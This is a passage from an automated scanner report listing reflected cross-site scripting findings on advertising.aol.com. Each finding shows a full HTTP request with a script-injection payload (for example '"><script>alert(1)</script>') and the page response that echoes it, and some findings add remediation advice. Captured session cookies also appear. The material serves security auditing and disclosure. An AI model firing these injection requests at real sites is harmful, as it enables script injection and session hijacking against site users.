Last-Modified: Sat, 17 Sep 2011 16:48:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4c13a"-alert(1)-"8431ceb2f9d/3/3/1557169105/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.81. http://advertising.aol.com/token/3/3/1557169105/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/3/3/1557169105/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6be9"><script>alert(1)</script>039211a30df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f6be9"><script>alert(1)</script>039211a30df/3/3/1557169105/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f6be9"><script>alert(1)</script>039211a30df/3/3/1557169105/" />
...[SNIP]...
4.82. http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/1/1128450710/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3710"><script>alert(1)</script>7274af88a73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b3710"><script>alert(1)</script>7274af88a73/4/1/1128450710/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/b3710"><script>alert(1)</script>7274af88a73/4/1/1128450710/" />
...[SNIP]...
4.83. http://advertising.aol.com/token/4/1/1128450710/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/1/1128450710/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12f6f"-alert(1)-"bf6f65277d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /12f6f"-alert(1)-"bf6f65277d7/4/1/1128450710/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/12f6f"-alert(1)-"bf6f65277d7/4/1/1128450710/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.84. http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/708534695/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7aa06"-alert(1)-"a74428db3c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /7aa06"-alert(1)-"a74428db3c9/4/3/708534695/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13400

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/7aa06"-alert(1)-"a74428db3c9/4/3/708534695/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...
4.85. http://advertising.aol.com/token/4/3/708534695/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/708534695/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69bea"><script>alert(1)</script>1ced0c96631 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /69bea"><script>alert(1)</script>1ced0c96631/4/3/708534695/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/69bea"><script>alert(1)</script>1ced0c96631/4/3/708534695/" />
...[SNIP]...
4.86. http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/2/1348442932/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27601"><script>alert(1)</script>83001201018 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /27601"><script>alert(1)</script>83001201018/5/2/1348442932/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/27601"><script>alert(1)</script>83001201018/5/2/1348442932/" />
...[SNIP]...
4.87. http://advertising.aol.com/token/5/2/1348442932/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/2/1348442932/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27551"-alert(1)-"d17c7163a68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /27551"-alert(1)-"d17c7163a68/5/2/1348442932/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:19 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/27551"-alert(1)-"d17c7163a68/5/2/1348442932/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.88. http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/1649521156/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96a23"-alert(1)-"38b4441aa25 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /96a23"-alert(1)-"38b4441aa25/5/3/1649521156/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:25 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:25 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/96a23"-alert(1)-"38b4441aa25/5/3/1649521156/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.89. http://advertising.aol.com/token/5/3/1649521156/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/1649521156/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feaf1"><script>alert(1)</script>39e73b78bbb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feaf1"><script>alert(1)</script>39e73b78bbb/5/3/1649521156/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:48:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 16:48:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/feaf1"><script>alert(1)</script>39e73b78bbb/5/3/1649521156/" />
...[SNIP]...
4.90. http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/1/1581270199/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9154d"-alert(1)-"54a37e32f48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9154d"-alert(1)-"54a37e32f48/6/1/1581270199/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:46 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/9154d"-alert(1)-"54a37e32f48/6/1/1581270199/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...
4.91. http://advertising.aol.com/token/6/1/1581270199/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/1/1581270199/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f20a6"><script>alert(1)</script>80e754d2ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /f20a6"><script>alert(1)</script>80e754d2ae/6/1/1581270199/ HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:16:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:16:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/f20a6"><script>alert(1)</script>80e754d2ae/6/1/1581270199/" />
...[SNIP]...
4.92. http://advertising.aol.com/token/6/3/882857095/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/882857095/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee14a"><script>alert(1)</script>2c72c6f0042 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ee14a"><script>alert(1)</script>2c72c6f0042/6/3/882857095/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
